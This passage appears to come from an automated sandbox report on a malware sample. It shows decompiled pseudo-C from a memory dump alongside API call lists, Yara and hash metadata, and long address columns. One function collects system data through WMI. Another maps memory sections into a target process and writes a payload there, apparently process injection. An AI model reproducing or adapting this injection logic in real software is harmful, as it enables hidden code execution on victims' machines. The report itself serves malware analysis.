                                                                                                                                                                                                • GetSystemInfo.KERNEL32(?), ref: 00AFD2AC
                                                                                                                                                                                                • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 00AFD2C9
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: CurrentProcess$ErrorFileLastModuleName$AllocateByteCharDirectoryHeapInfoMultiSystemVersionWideWindowsmemset
                                                                                                                                                                                                • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
                                                                                                                                                                                                • API String ID: 3876402152-2706916422
                                                                                                                                                                                                • Opcode ID: d79b34c582b1c4b5bff63d1fb6968623631b7f5361c35f3c805bb73b1d72adeb
                                                                                                                                                                                                • Instruction ID: 606e6abad7e46e924ce45711d10660a1ca5c41b23872990d99033a0d31f64e2f
                                                                                                                                                                                                • Opcode Fuzzy Hash: d79b34c582b1c4b5bff63d1fb6968623631b7f5361c35f3c805bb73b1d72adeb
                                                                                                                                                                                                • Instruction Fuzzy Hash: EDB14D71600709AFD710EBB4DD89FEA77E9EF18300F004969F65AD7291EF70AA448B61
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFDB7E, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                			E00AFDB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E00AFD565(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E00AF85E5(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E00AF85FB( &_v60, 0xfffffffe);
					E00AFD619( &_v104);
					return _t320;
				}
				_t165 = E00AF95C2(_t255, 0x536);
				 *_t328 = 0x609;
				_v52 = _t165;
				_t166 = E00AF95C2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E00AF92C6(_t165);
				_v60 = _t322;
				E00AF85B6( &_v52);
				E00AF85B6( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E00AF95C2(_t255, 0x9e4);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E00AF85B6( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E00AF85FB( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E00AF91C4(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E00AF91C4(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E00AF8679(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E00AF85E5( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E00AF85FB(_t136, 0);
								E00AF85FB( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E00AF91C4(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E00AF95C2(_t281, 0x250);
								 *_t329 = 0x4cc;
								_t217 = E00AF95C2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00AF85E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E00AF85B6( &_v92);
											E00AF85B6( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E00AF9621();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E00AF85E5(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E00AF95C2(_t283, 0x219);
										E00AF9621( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E00AF85B6( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E00AF91C4(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E00AFDA62( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E00AF85FB( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                                                0x00afdb87
                                                                                                                                                                                                0x00afdb8d
                                                                                                                                                                                                0x00afdb94
                                                                                                                                                                                                0x00afdb97
                                                                                                                                                                                                0x00afdb9a
                                                                                                                                                                                                0x00afdb9f
                                                                                                                                                                                                0x00afdba1
                                                                                                                                                                                                0x00afdba6
                                                                                                                                                                                                0x00afdfee
                                                                                                                                                                                                0x00afdfee
                                                                                                                                                                                                0x00afdbb3
                                                                                                                                                                                                0x00afdbb5
                                                                                                                                                                                                0x00afdbb8
                                                                                                                                                                                                0x00afdbbb
                                                                                                                                                                                                0x00afdfd3
                                                                                                                                                                                                0x00afdfd9
                                                                                                                                                                                                0x00afdfe3
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdfe8
                                                                                                                                                                                                0x00afdbc6
                                                                                                                                                                                                0x00afdbcd
                                                                                                                                                                                                0x00afdbd4
                                                                                                                                                                                                0x00afdbd7
                                                                                                                                                                                                0x00afdbdc
                                                                                                                                                                                                0x00afdbde
                                                                                                                                                                                                0x00afdbe1
                                                                                                                                                                                                0x00afdbe4
                                                                                                                                                                                                0x00afdbe5
                                                                                                                                                                                                0x00afdbee
                                                                                                                                                                                                0x00afdbf4
                                                                                                                                                                                                0x00afdbf7
                                                                                                                                                                                                0x00afdc00
                                                                                                                                                                                                0x00afdc05
                                                                                                                                                                                                0x00afdc0a
                                                                                                                                                                                                0x00afdc21
                                                                                                                                                                                                0x00afdc2e
                                                                                                                                                                                                0x00afdc31
                                                                                                                                                                                                0x00afdc38
                                                                                                                                                                                                0x00afdc3d
                                                                                                                                                                                                0x00afdc44
                                                                                                                                                                                                0x00afdc49
                                                                                                                                                                                                0x00afdc50
                                                                                                                                                                                                0x00afdc52
                                                                                                                                                                                                0x00afdc5e
                                                                                                                                                                                                0x00afdc61
                                                                                                                                                                                                0x00afdc63
                                                                                                                                                                                                0x00afdfc3
                                                                                                                                                                                                0x00afdfc4
                                                                                                                                                                                                0x00afdfcd
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdfcd
                                                                                                                                                                                                0x00afdc69
                                                                                                                                                                                                0x00afdc6c
                                                                                                                                                                                                0x00afdc6f
                                                                                                                                                                                                0x00afdc72
                                                                                                                                                                                                0x00afdc74
                                                                                                                                                                                                0x00afdf8f
                                                                                                                                                                                                0x00afdf92
                                                                                                                                                                                                0x00afdf95
                                                                                                                                                                                                0x00afdf97
                                                                                                                                                                                                0x00afdfb9
                                                                                                                                                                                                0x00afdfbe
                                                                                                                                                                                                0x00afdf99
                                                                                                                                                                                                0x00afdf9c
                                                                                                                                                                                                0x00afdfa7
                                                                                                                                                                                                0x00afdfae
                                                                                                                                                                                                0x00afdfae
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdc7a
                                                                                                                                                                                                0x00afdc7a
                                                                                                                                                                                                0x00afdc8c
                                                                                                                                                                                                0x00afdc8f
                                                                                                                                                                                                0x00afdc91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdc99
                                                                                                                                                                                                0x00afdc9c
                                                                                                                                                                                                0x00afdc9f
                                                                                                                                                                                                0x00afdca2
                                                                                                                                                                                                0x00afdca5
                                                                                                                                                                                                0x00afdca8
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdcae
                                                                                                                                                                                                0x00afdcbc
                                                                                                                                                                                                0x00afdcbf
                                                                                                                                                                                                0x00afdcc1
                                                                                                                                                                                                0x00afdcda
                                                                                                                                                                                                0x00afdce9
                                                                                                                                                                                                0x00afdcf1
                                                                                                                                                                                                0x00afdcf1
                                                                                                                                                                                                0x00afdcf4
                                                                                                                                                                                                0x00afdcfb
                                                                                                                                                                                                0x00afdcff
                                                                                                                                                                                                0x00afdd05
                                                                                                                                                                                                0x00afdd07
                                                                                                                                                                                                0x00afdf77
                                                                                                                                                                                                0x00afdf7d
                                                                                                                                                                                                0x00afdf83
                                                                                                                                                                                                0x00afdf86
                                                                                                                                                                                                0x00afdf86
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf86
                                                                                                                                                                                                0x00afdd16
                                                                                                                                                                                                0x00afdd2a
                                                                                                                                                                                                0x00afdd2e
                                                                                                                                                                                                0x00afdd30
                                                                                                                                                                                                0x00afdd35
                                                                                                                                                                                                0x00afdf44
                                                                                                                                                                                                0x00afdf4a
                                                                                                                                                                                                0x00afdf55
                                                                                                                                                                                                0x00afdf60
                                                                                                                                                                                                0x00afdf66
                                                                                                                                                                                                0x00afdf6c
                                                                                                                                                                                                0x00afdf6f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf6f
                                                                                                                                                                                                0x00afdd3b
                                                                                                                                                                                                0x00afdf12
                                                                                                                                                                                                0x00afdf12
                                                                                                                                                                                                0x00afdf15
                                                                                                                                                                                                0x00afdf18
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdd43
                                                                                                                                                                                                0x00afdd4b
                                                                                                                                                                                                0x00afdd52
                                                                                                                                                                                                0x00afdd58
                                                                                                                                                                                                0x00afdd5a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdd63
                                                                                                                                                                                                0x00afdd78
                                                                                                                                                                                                0x00afdd7e
                                                                                                                                                                                                0x00afdd87
                                                                                                                                                                                                0x00afdd8a
                                                                                                                                                                                                0x00afdd8d
                                                                                                                                                                                                0x00afdd8f
                                                                                                                                                                                                0x00afdf05
                                                                                                                                                                                                0x00afdf08
                                                                                                                                                                                                0x00afdf11
                                                                                                                                                                                                0x00afdf11
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf11
                                                                                                                                                                                                0x00afdd9f
                                                                                                                                                                                                0x00afdda2
                                                                                                                                                                                                0x00afdda9
                                                                                                                                                                                                0x00afddaf
                                                                                                                                                                                                0x00afddb2
                                                                                                                                                                                                0x00afddb5
                                                                                                                                                                                                0x00afddb8
                                                                                                                                                                                                0x00afddbb
                                                                                                                                                                                                0x00afddf7
                                                                                                                                                                                                0x00afddf7
                                                                                                                                                                                                0x00afddfa
                                                                                                                                                                                                0x00afdea6
                                                                                                                                                                                                0x00afdeba
                                                                                                                                                                                                0x00afdeca
                                                                                                                                                                                                0x00afdece
                                                                                                                                                                                                0x00afded0
                                                                                                                                                                                                0x00afdee7
                                                                                                                                                                                                0x00afdeeb
                                                                                                                                                                                                0x00afdef4
                                                                                                                                                                                                0x00afdeff
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdeff
                                                                                                                                                                                                0x00afded6
                                                                                                                                                                                                0x00afded7
                                                                                                                                                                                                0x00afdedc
                                                                                                                                                                                                0x00afdedc
                                                                                                                                                                                                0x00afdede
                                                                                                                                                                                                0x00afdedf
                                                                                                                                                                                                0x00afdee4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdee4
                                                                                                                                                                                                0x00afde00
                                                                                                                                                                                                0x00afde00
                                                                                                                                                                                                0x00afde03
                                                                                                                                                                                                0x00afde6e
                                                                                                                                                                                                0x00afde82
                                                                                                                                                                                                0x00afde92
                                                                                                                                                                                                0x00afde96
                                                                                                                                                                                                0x00afde98
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afde9e
                                                                                                                                                                                                0x00afde9f
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afde9f
                                                                                                                                                                                                0x00afde05
                                                                                                                                                                                                0x00afde05
                                                                                                                                                                                                0x00afde08
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afde0a
                                                                                                                                                                                                0x00afde0d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afde0f
                                                                                                                                                                                                0x00afde0f
                                                                                                                                                                                                0x00afde15
                                                                                                                                                                                                0x00afde31
                                                                                                                                                                                                0x00afde40
                                                                                                                                                                                                0x00afde49
                                                                                                                                                                                                0x00afde4e
                                                                                                                                                                                                0x00afde51
                                                                                                                                                                                                0x00afde57
                                                                                                                                                                                                0x00afde57
                                                                                                                                                                                                0x00afde5c
                                                                                                                                                                                                0x00afde68
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afde68
                                                                                                                                                                                                0x00afde1a
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afde1a
                                                                                                                                                                                                0x00afddbd
                                                                                                                                                                                                0x00afdde4
                                                                                                                                                                                                0x00afdde9
                                                                                                                                                                                                0x00afddee
                                                                                                                                                                                                0x00afddf0
                                                                                                                                                                                                0x00afddf0
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afddee
                                                                                                                                                                                                0x00afddbf
                                                                                                                                                                                                0x00afddbf
                                                                                                                                                                                                0x00afddc2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afddc8
                                                                                                                                                                                                0x00afddc8
                                                                                                                                                                                                0x00afddcb
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afddd1
                                                                                                                                                                                                0x00afddd1
                                                                                                                                                                                                0x00afddd4
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afddda
                                                                                                                                                                                                0x00afdddd
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdddf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdddf
                                                                                                                                                                                                0x00afdf21
                                                                                                                                                                                                0x00afdf27
                                                                                                                                                                                                0x00afdf2d
                                                                                                                                                                                                0x00afdf30
                                                                                                                                                                                                0x00afdf33
                                                                                                                                                                                                0x00afdf33
                                                                                                                                                                                                0x00afdf36
                                                                                                                                                                                                0x00afdf37
                                                                                                                                                                                                0x00afdf3a
                                                                                                                                                                                                0x00afdf3c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf8c
                                                                                                                                                                                                0x00afdf8c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdf8c
                                                                                                                                                                                                0x00afdcc3
                                                                                                                                                                                                0x00afdcc9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdcc9
                                                                                                                                                                                                0x00afdf89
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdc0c
                                                                                                                                                                                                0x00afdc11
                                                                                                                                                                                                0x00afdc16
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00afdc1a

                                                                                                                                                                                                APIs
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD578
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD589
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoCreateInstance.OLE32(00B0B848,00000000,00000001,00B0B858,?,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5A0
                                                                                                                                                                                                  • Part of subcall function 00AFD565: SysAllocString.OLEAUT32(00000000), ref: 00AFD5AB
                                                                                                                                                                                                  • Part of subcall function 00AFD565: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,00AFD865,00000C5B,00000000,?,00000000), ref: 00AFD5D6
                                                                                                                                                                                                  • Part of subcall function 00AF85E5: RtlAllocateHeap.NTDLL(00000008,?,?,00AF8F65,00000100,?,00AF5FAC), ref: 00AF85F3
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFDC27
                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00AFDC3B
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFDFC4
                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00AFDFCD
                                                                                                                                                                                                  • Part of subcall function 00AF85FB: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,00AF6024), ref: 00AF8641
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                                                                                                                • String ID: FALSE$TRUE
                                                                                                                                                                                                • API String ID: 1290676130-1412513891
                                                                                                                                                                                                • Opcode ID: 845d80b4afcefb54bbcd834f44bac553c28b7e31b1315447456bcafce04292d9
                                                                                                                                                                                                • Instruction ID: c2d4d907e72b66065f55d52140888c03d97700e2ba7f3f5975dec1d1a262cbf5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 845d80b4afcefb54bbcd834f44bac553c28b7e31b1315447456bcafce04292d9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE14B71A0021DAFCB15EFE4C995EBEBBBAFF48300F104559F646AB291DB34A905CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00AFC702, Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 200registryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 59%
                                                                                                                                                                                                			E00AFC702(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				struct HINSTANCE__* _v40;
				char _v44;
				char _v56;
				char _v72;
				struct _WNDCLASSEXA _v120;
				intOrPtr _t69;
				intOrPtr _t71;
				intOrPtr _t75;
				intOrPtr _t80;
				intOrPtr _t92;
				intOrPtr _t95;
				intOrPtr _t96;
				struct HWND__* _t106;
				intOrPtr* _t113;
				struct HINSTANCE__* _t116;
				intOrPtr _t120;
				intOrPtr _t126;
				intOrPtr _t131;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t139;
				char _t140;
				intOrPtr _t141;

				_t69 =  *0xb0e688; // 0xb20000
				_t126 = __ecx;
				_t134 = __edx;
				_t116 = 0;
				_v36 = __edx;
				_v16 = 0;
				_v44 = 0;
				_v40 = 0;
				_v12 = 0;
				_v8 = 0;
				_v24 = 0;
				_v20 = __ecx;
				if(( *(_t69 + 0x1898) & 0x00000040) != 0) {
					E00AFE280(0x1f4);
					_t116 = 0;
				}
				_t113 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_v28 = _t116;
				if( *_t113 != 0x4550) {
					L12:
					if(_v8 != 0) {
						_t75 =  *0xb0e780; // 0x0
						 *((intOrPtr*)(_t75 + 0x10))(_t126, _v8);
						_v8 = _v8 & 0x00000000;
					}
					L14:
					if(_v12 != 0) {
						_t136 =  *0xb0e780; // 0x0
						 *((intOrPtr*)(_t136 + 0x10))(GetCurrentProcess(), _v12);
					}
					if(_v16 != 0) {
						_t71 =  *0xb0e780; // 0x0
						 *((intOrPtr*)(_t71 + 0x20))(_v16);
					}
					return _v8;
				}
				_push(_t116);
				_push(0x8000000);
				_v44 =  *((intOrPtr*)(_t113 + 0x50));
				_push(0x40);
				_push( &_v44);
				_push(_t116);
				_push(0xe);
				_push( &_v16);
				_t80 =  *0xb0e780; // 0x0
				if( *((intOrPtr*)(_t80 + 0xc))() < 0) {
					goto L12;
				}
				_v120.style = 0xb;
				_v120.cbSize = 0x30;
				_v120.lpszClassName =  &_v56;
				asm("movsd");
				_v120.lpfnWndProc = DefWindowProcA;
				asm("movsd");
				asm("movsd");
				asm("movsb");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_v120.cbWndExtra = 0;
				_v120.lpszMenuName = 0;
				_v120.cbClsExtra = 0;
				_v120.hInstance = 0;
				if(RegisterClassExA( &_v120) != 0) {
					_t106 = CreateWindowExA(0,  &_v56,  &_v72, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, 0, 0, 0, 0);
					if(_t106 != 0) {
						DestroyWindow(_t106);
						UnregisterClassA( &_v56, 0);
					}
				}
				_t139 =  *0xb0e780; // 0x0
				_push(0x40);
				_push(0);
				_push(2);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v12);
				_push(GetCurrentProcess());
				_push(_v16);
				if( *((intOrPtr*)(_t139 + 0x14))() < 0) {
					_t126 = _v20;
					goto L12;
				} else {
					_push(0x40);
					_push(0);
					_push(2);
					_push( &_v24);
					_push(0);
					_push(0);
					_push(0);
					_t126 = _v20;
					_push( &_v8);
					_t92 =  *0xb0e780; // 0x0
					_push(_t126);
					_push(_v16);
					if( *((intOrPtr*)(_t92 + 0x14))() < 0) {
						goto L12;
					}
					_t140 = E00AF864A( *0xb0e688, 0x1ac4);
					_v32 = _t140;
					if(_t140 == 0) {
						goto L12;
					}
					 *((intOrPtr*)(_t140 + 0x224)) = _v8;
					_t95 =  *0xb0e684; // 0x4d3f6c8
					_t96 =  *((intOrPtr*)(_t95 + 0x54))(_t126, 0, 0x1ac4, 0x1000, 4);
					_t120 =  *0xb0e684; // 0x4d3f6c8
					_t131 = _t96;
					 *((intOrPtr*)(_t120 + 0x20))(_v20, _t131, _t140, 0x1ac4,  &_v28);
					E00AF85FB( &_v32, 0x1ac4);
					_t141 =  *0xb0e688; // 0xb20000
					 *0xb0e688 = _t131;
					E00AF86C2(_v12, _v36,  *((intOrPtr*)(_t113 + 0x50)));
					E00AFC681(_v12, _v8, _v36);
					 *0xb0e688 = _t141;
					goto L14;
				}
			}


































                                                                                                                                                                                                0x00afc708
                                                                                                                                                                                                0x00afc70f
                                                                                                                                                                                                0x00afc711
                                                                                                                                                                                                0x00afc713
                                                                                                                                                                                                0x00afc715
                                                                                                                                                                                                0x00afc718
                                                                                                                                                                                                0x00afc71b
                                                                                                                                                                                                0x00afc71e
                                                                                                                                                                                                0x00afc721
                                                                                                                                                                                                0x00afc724
                                                                                                                                                                                                0x00afc727
                                                                                                                                                                                                0x00afc731
                                                                                                                                                                                                0x00afc734
                                                                                                                                                                                                0x00afc73b
                                                                                                                                                                                                0x00afc740
                                                                                                                                                                                                0x00afc740
                                                                                                                                                                                                0x00afc746
                                                                                                                                                                                                0x00afc748
                                                                                                                                                                                                0x00afc751
                                                                                                                                                                                                0x00afc8f7
                                                                                                                                                                                                0x00afc8fb
                                                                                                                                                                                                0x00afc900
                                                                                                                                                                                                0x00afc906
                                                                                                                                                                                                0x00afc909
                                                                                                                                                                                                0x00afc909
                                                                                                                                                                                                0x00afc90d
                                                                                                                                                                                                0x00afc912
                                                                                                                                                                                                0x00afc917
                                                                                                                                                                                                0x00afc924
                                                                                                                                                                                                0x00afc924
                                                                                                                                                                                                0x00afc92d
